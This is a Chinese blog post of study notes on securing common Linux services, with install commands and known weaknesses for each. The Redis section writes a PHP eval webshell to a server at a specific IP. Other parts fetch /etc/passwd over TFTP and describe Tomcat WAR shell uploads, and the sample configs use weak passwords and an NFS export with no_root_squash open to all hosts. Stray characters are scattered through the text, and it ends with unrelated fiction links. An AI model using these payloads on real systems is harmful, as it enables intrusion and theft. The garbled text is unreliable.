Linux 服務 安全

apache2.sh

常見問題

  • 解析漏洞
    不管文件最后后綴為什么,只要是.php.*結尾,就會被Apache服務器解析成php文件
  • phpinfo
    在網(wǎng)站后info.php查看版本和目錄信息

dns.sh

常見漏洞

  • DNS 域傳送
  • DNS 反彈Shells

安全性報告

https://www.sans.org/reading-room/whitepapers/dns/security-issues-dns-1069

redhat安配置DNS服務器

http://www.ahlinux.com/centos/8659.html

redhat安裝

yum install dnsmasq

ftp.sh

存在問題

  • 明文傳輸
  • 密碼直接可以嗅探到

Redhat安裝

yum install vsftpd ftp -y
vi /etc/vsftpd/vsftpd.conf
systemctl enable vsftpd
systemctl start vsftpd
firewall-cmd --permanent --add-port=21/tcp
firewall-cmd --permanent --add-service=ftp
Restart firewall:
firewall-cmd --reload
Then, update the SELinux boolean values for FTP service:
setsebool -P ftp_home_dir on
創(chuàng)建新的用戶來作為ftp的登錄用戶
500 OOPS 錯誤:創(chuàng)建的用戶在主目錄下面擁有寫的權限
問題解決: chmod a-w /home/user

mail.sh

yum install cyrus-imapd-utils

安全問題

  • POP3 和 STMP 均不是加密協(xié)議
  • 密碼脆弱
  • 服務易受緩沖區(qū)溢出攻擊

mongodb.sh

https://www.liquidweb.com/kb/how-to-install-mongodb-on-centos-7/

安全問題

  • 未授權訪問

mysql.sh

yum install mariadb mariadb-server
systemctl start mariadb # 啟動mariadb
systemctl enable mariadb #開機自啟動
mysql_secure_installation # 設置 root密碼等相關
mysql -uroot -p123456 # 測試登錄竞慢!


遠程登錄要修改主機防火墻規(guī)則 
 vi /etc/sysconfig/iptables
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 3306 -j ACCEPT

安全問題

nfs.sh

服務檢測方法

檢測目標是否有掛載
showmount -e 10.0.3.71
mkdir -p /mnt/nfs
mount -t nfs 127.0.0.1:/var/nfs /mnt/nfs -o nolock
umount /mnt/nfs

https://help.ubuntu.com/community/SettingUpNFSHowTo ubuntu官方介紹

服務簡介

net file system
The computer where directory located is called the server and computers or devices connecting to that server are called clients.
Clients usually 'mount' the shared directory to make it a part of their own directory structure.

Redhat安裝方法

yum -y install nfs-utils
systemctl enable nfs-server.service
systemctl start nfs-server.service
mkdir /var/nfs
chmod 755 /var/nfs
echo "/var/nfs * (rw,no_root_squash)" >> /etc/exports   //*統(tǒng)配源端IP
exportfs -a

https://www.howtoforge.com/tutorial/setting-up-an-nfs-server-and-client-on-centos-7/   centos
chown nfsnobody:nfsnobody /var/nfs
chmod 755 /var/nfs


配置時遇到的問題:
執(zhí)行exportfs -a 的時候顯示警告
exportfs: No options for /var/nfs 10.211.55.2: suggest 10.211.55.2(sync) to avoid warning
exportfs: No host name given with /var/nfs (rw,no_root_squash), suggest *(rw,no_root_squash) to avoid warning
根據(jù)系統(tǒng)提示后修改為 /var/nfs *(sync) *(rw,no_root_squash)
掛載的文件系統(tǒng)不一樣 -t 參數(shù)中找不到對方的文件系統(tǒng)ext4


cilent配置與上類似
yum install nfs-utils

常見漏洞

  • 配置不當就可以直接掛在獲取文件信息

redis.sh

Redis是一個開源、支持網(wǎng)絡治泥、基于內(nèi)存筹煮、鍵值對存儲數(shù)據(jù)庫

Redhat安裝方法

參考:
https://segmentfault.com/a/1190000002685224
wget http://download.redis.io/redis-stable.tar.gz

存在的漏洞:

利用前提:
1.redis未授權 能redis-cli連上
2.開了web并且知道路徑(如利用phpinfo)

端口:6379
測試方法:
redis-cli -h 121.14.127.101 ping

利用redis寫Webshell

https://www.secpulse.com/archives/5357.html

redis 121.14.127.101:6379> config set dbfilename hd.php
OK
redis 121.14.127.101:6379> set k "<?php eval($_POST['cmd'])?>"
OK
redis 121.14.127.101:6379> save
OK

redis服務詳細配置 http://www.cnblogs.com/shanyou/archive/2012/01/28/2330451.html

rsync.sh

服務簡介

remote sync 遠程同步 用來備份

常見問題:

  • 配置不當導致 弱口令 匿名訪問(較多)

測試方法

rsync 10.210.208.39::dataserver/weibo_BD/

參考:http://static.hx99.net/static/drops/papers-161.html

snmp.sh

Redhat安裝

yum install -y net-snmp net-snmp-utils
 vi /etc/snmp/snmpd.conf  配置
[root@centos-7-va]~# echo rouser 123 auth >>  /etc/snmp/snmpd.conf
[root@centos-7-va]~# echo createUser 123 MD5 123 >>  /etc/snmp/snmpd.conf

參考
http://null-byte.wonderhowto.com/how-to/hack-like-pro-exploit-snmp-for-reconnaissance-0150181/

安全風險:

If we can crack the password on SNMP, we may be able to control each networked device.
This would allow us to change configurations, take devices offline, etc.

  • 利用 SNMPv1協(xié)議 無驗證

ssh.sh

新版的debian中并不允許root遠程登錄
要是想要root遠程 登錄需要在
vim /etc/ssh/sshd_config
修改配置

存在漏洞

telnet.sh

安全問題

telnet最大的問題就是不是一個加密通信協(xié)議
弱口令

tftp.sh

安全問題

  • tftp 不提供驗證功能,所以理論上來講可以上傳下載任何文件
    /etc/shadow 重點關注
    get /etc/passwd /tmp/passwd 下載文件

測試方法

TFTP 用于 UDP 端口號 69 文件傳輸活動

tomcat8.sh

安全問題

  • tomcat 后臺管理頁面 弱密碼
    將含有shell的war包傳上去
    Tomcat服務默認是以system權限運行的,因此該shell就繼承了其權限居夹,幾乎可以對Web服務器進行所有的操作败潦。

vnc.sh

安全問題

VNC 預設的端口5900至5906
密碼可以被嗅探,暴力破解

Redhat 安裝

https://www.howtoforge.com/vnc-server-installation-on-centos-7
根據(jù)配置會為每個用戶分配端口號,依據(jù)配置文件中的:1 + 5900

memcache未授權訪問

memcache未授權訪問, 除memcached中數(shù)據(jù)可被直接讀取泄漏和惡意修改外,由于memcached中的數(shù)據(jù)像正常網(wǎng)站用戶訪問提交變量一樣會被后端代碼處理准脂,當處理代碼存在缺陷時會再次導致不同類型的安全問題劫扒。

建議不要將改服務發(fā)布到互聯(lián)網(wǎng)上被黑客利用,可以通過ECS安全組規(guī)則或iptables配置訪問控制規(guī)則狸膏。
iptables -A INPUT -p tcp -s 192.168.0.2 —dport 11211 -j ACCEPT
上述規(guī)則的意思是只允許192.168.0.2這個ip對11211端口進行訪問沟饥。

最后編輯于
?著作權歸作者所有,轉載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末,一起剝皮案震驚了整個濱河市湾戳,隨后出現(xiàn)的幾起案子贤旷,更是在濱河造成了極大的恐慌,老刑警劉巖砾脑,帶你破解...
    沈念sama閱讀 218,941評論 6 508
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件幼驶,死亡現(xiàn)場離奇詭異,居然都是意外死亡拦止,警方通過查閱死者的電腦和手機县遣,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,397評論 3 395
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來汹族,“玉大人萧求,你說我怎么就攤上這事《ヂ鳎” “怎么了夸政?”我有些...
    開封第一講書人閱讀 165,345評論 0 356
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵,是天一觀的道長榴徐。 經(jīng)常有香客問我守问,道長匀归,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,851評論 1 295
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任耗帕,我火速辦了婚禮穆端,結果婚禮上,老公的妹妹穿的比我還像新娘仿便。我一直安慰自己体啰,他們只是感情好,可當我...
    茶點故事閱讀 67,868評論 6 392
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布嗽仪。 她就那樣靜靜地躺著荒勇,像睡著了一般。 火紅的嫁衣襯著肌膚如雪闻坚。 梳的紋絲不亂的頭發(fā)上沽翔,一...
    開封第一講書人閱讀 51,688評論 1 305
  • 城市分裂傳說
    那天,我揣著相機與錄音窿凤,去河邊找鬼仅偎。 笑死,一個胖子當著我的面吹牛卷玉,可吹牛的內(nèi)容都是我干的哨颂。 我是一名探鬼主播,決...
    沈念sama閱讀 40,414評論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼相种,長吁一口氣:“原來是場噩夢啊……” “哼威恼!你這毒婦竟也來了?” 一聲冷哼從身側響起寝并,我...
    開封第一講書人閱讀 39,319評論 0 276
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤箫措,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后衬潦,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體斤蔓,經(jīng)...
    沈念sama閱讀 45,775評論 1 315
  • ?護林員之死
    正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,945評論 3 336
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年镀岛,在試婚紗的時候發(fā)現(xiàn)自己被綠了弦牡。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 40,096評論 1 350
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡漂羊,死狀恐怖驾锰,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情走越,我是刑警寧澤椭豫,帶...
    沈念sama閱讀 35,789評論 5 346
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布,位于F島的核電站,受9級特大地震影響赏酥,放射性物質發(fā)生泄漏喳整。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,437評論 3 331
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一裸扶、第九天 我趴在偏房一處隱蔽的房頂上張望框都。 院中可真熱鬧,春花似錦呵晨、人聲如沸瞬项。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,993評論 0 22
  • 一樁弒父案何荚,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至猪杭,卻和暖如春餐塘,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背皂吮。 一陣腳步聲響...
    開封第一講書人閱讀 33,107評論 1 271
  • 情欲美人皮
    我被黑心中介騙來泰國打工戒傻, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人蜂筹。 一個月前我還...
    沈念sama閱讀 48,308評論 3 372
  • 代替公主和親
    正文 我出身青樓需纳,卻偏偏與公主長得像,于是被迫代替她去往敵國和親艺挪。 傳聞我的和親對象是個殘疾皇子不翩,可洞房花燭夜當晚...
    茶點故事閱讀 45,037評論 2 355

推薦閱讀更多精彩內(nèi)容